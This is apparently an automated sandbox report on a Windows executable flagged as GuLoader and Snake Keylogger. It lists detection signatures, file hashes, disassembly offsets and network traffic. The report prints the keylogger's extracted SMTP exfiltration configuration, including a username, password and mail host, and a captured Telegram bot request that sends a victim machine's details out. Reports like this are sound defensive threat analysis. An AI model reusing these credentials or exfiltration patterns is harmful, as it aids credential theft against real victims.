Windows Analysis Report
SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe

Overview

General Information

Sample name: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
Analysis ID: 1527845
MD5: e7ebd3de4bcba42feee0d2bd98521920
SHA1: 71608b8fd542467e554766de37cdc8244c84286f
SHA256: 383d758b111ebf7255078b12d04f9f0e39ea4f85733563344754cbaad4bf0581
Infos:

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Found malware configuration
Source: 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "bagslog@cybertechllc.top", "Password": "7213575aceACE@@ ", "Host": "mail.cybertechllc.top", "Port": "587", "Version": "4.4"}
Multi AV Scanner detection for submitted file
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe ReversingLabs: Detection: 55%

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385DC9A8 CryptUnprotectData, 11_2_385DC9A8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385DD078 CryptUnprotectData, 11_2_385DD078
Uses 32bit PE files
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 172.67.177.134:443 -> 192.168.11.20:49711 version: TLS 1.0
Source: unknown HTTPS traffic detected: 142.250.80.46:443 -> 192.168.11.20:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.65.225:443 -> 192.168.11.20:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49720 version: TLS 1.2
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Windows.Forms.pdb source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000717DB000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000717DB000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000717DB000.00000020.00000001.01000000.0000000C.sdmp
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_00406001 FindFirstFileA,FindClose, 0_2_00406001
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_0040559F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_0040559F
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_00402688 FindFirstFileA, 0_2_00402688
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_00406001 FindFirstFileA,FindClose, 11_2_00406001
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_00402688 FindFirstFileA, 11_2_00402688
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_0040559F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 11_2_0040559F
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 11_2_0011F048
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 11_2_0011F67B
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 11_2_0011F85B
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385D021Dh 11_2_385D0040
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385D0BA7h 11_2_385D0040
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385D2870h 11_2_385D2458
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385D2131h 11_2_385D1E80
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385DFAB7h 11_2_385DF810
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385DF65Fh 11_2_385DF3B8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385D2870h 11_2_385D2448
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then mov esp, ebp 11_2_385DECC8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385DF207h 11_2_385DEF60
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385D2870h 11_2_385D279E
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385EABB7h 11_2_385EA8E8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385EA5CBh 11_2_385EA290
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E8E49h 11_2_385E8BA0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E29FFh 11_2_385E2758
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385ECC1Eh 11_2_385EC950
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E1CF7h 11_2_385E1A50
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E89EFh 11_2_385E8748
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E0FEFh 11_2_385E0D48
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E02E7h 11_2_385E0040
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E7CE7h 11_2_385E7A40
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385EEC0Eh 11_2_385EE940
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E5E1Fh 11_2_385E5B78
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385ED53Eh 11_2_385ED270
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E5117h 11_2_385E4E70
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E440Fh 11_2_385E4168
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E3707h 11_2_385E3460
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385EF52Eh 11_2_385EF260
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E4CBFh 11_2_385E4A18
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E3FB7h 11_2_385E3D10
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385EB9DEh 11_2_385EB710
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E32AFh 11_2_385E3008
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385ED9CEh 11_2_385ED700
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E25A7h 11_2_385E2300
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E6FDFh 11_2_385E6D38
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385EA0DFh 11_2_385E9E38
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E93D7h 11_2_385E9130
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385EC2FEh 11_2_385EC030
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385EE2EEh 11_2_385EE020
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E59C7h 11_2_385E5720
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385EF09Eh 11_2_385EEDD0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E556Fh 11_2_385E52C8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385EC78Eh 11_2_385EC4C0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E4867h 11_2_385E45C0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E189Fh 11_2_385E15F8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E0B97h 11_2_385E08F0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E8597h 11_2_385E82F0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385EB0BEh 11_2_385EADF0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385EF9BEh 11_2_385EF6F0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E788Fh 11_2_385E75E8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385ED0AEh 11_2_385ECDE0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E9C87h 11_2_385E99E0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E073Fh 11_2_385E0498
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E813Fh 11_2_385E7E98
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E7437h 11_2_385E7190
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385EDE5Eh 11_2_385EDB90
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E982Fh 11_2_385E9588
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385EB54Eh 11_2_385EB280
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E3B5Fh 11_2_385E38B8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E2E57h 11_2_385E2BB0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385EE77Eh 11_2_385EE4B0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E214Fh 11_2_385E1EA8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385E1447h 11_2_385E11A0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 385EBE6Eh 11_2_385EBBA0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C864E0h 11_2_38C861E8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C8DC68h 11_2_38C8D970
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C83996h 11_2_38C836C8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C8EAC0h 11_2_38C8E7C8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C8BFB8h 11_2_38C8BCC0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C8A7D0h 11_2_38C8A4D8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C8079Eh 11_2_38C804D0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C87CC8h 11_2_38C879D0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C842B6h 11_2_38C83FE8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C8FDE0h 11_2_38C8FAE8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C8D2D8h 11_2_38C8CFE0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C822C6h 11_2_38C81FF8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C8BAF0h 11_2_38C8B7F8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C810BEh 11_2_38C80DF0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C88FE8h 11_2_38C88CF0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C82756h 11_2_38C82488
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C8C480h 11_2_38C8C188
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C8154Eh 11_2_38C81280
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C89978h 11_2_38C89680
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C85066h 11_2_38C84D98
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C88190h 11_2_38C87E98
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C8EF88h 11_2_38C8EC90
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C83076h 11_2_38C82DA8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C8D7A0h 11_2_38C8D4A8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C8AC98h 11_2_38C8A9A0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C85986h 11_2_38C856B8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C894B0h 11_2_38C891B8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C869A8h 11_2_38C866B0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C85EB7h 11_2_38C85B48
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C89E40h 11_2_38C89B48
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C8030Eh 11_2_38C80040
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C87338h 11_2_38C87040
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C83E26h 11_2_38C83B58
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C8F450h 11_2_38C8F158
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C8C948h 11_2_38C8C650
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C81E36h 11_2_38C81B68
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C8B160h 11_2_38C8AE68
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C80C2Eh 11_2_38C80960
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C88658h 11_2_38C88360
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C84747h 11_2_38C84478
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C86E70h 11_2_38C86B78
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C84BD6h 11_2_38C84908
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C87800h 11_2_38C87508
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C8E5F8h 11_2_38C8E300
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C82BE6h 11_2_38C82918
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C8CE10h 11_2_38C8CB18
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C819B7h 11_2_38C81710
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C8A308h 11_2_38C8A010
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C854F6h 11_2_38C85228
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C88B20h 11_2_38C88828
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C8F918h 11_2_38C8F620
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C83506h 11_2_38C83238
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C8E130h 11_2_38C8DE38
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38C8B628h 11_2_38C8B330
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38CA1B20h 11_2_38CA1828
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38CA1190h 11_2_38CA0E98
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 4x nop then jmp 38CA0339h 11_2_38CA0040

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:936905%0D%0ADate%20and%20Time:%2007/10/2024%20/%2004:56:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20936905%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 172.67.177.134 172.67.177.134
Source: Joe Sandbox View IP Address: 132.226.247.73 132.226.247.73
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
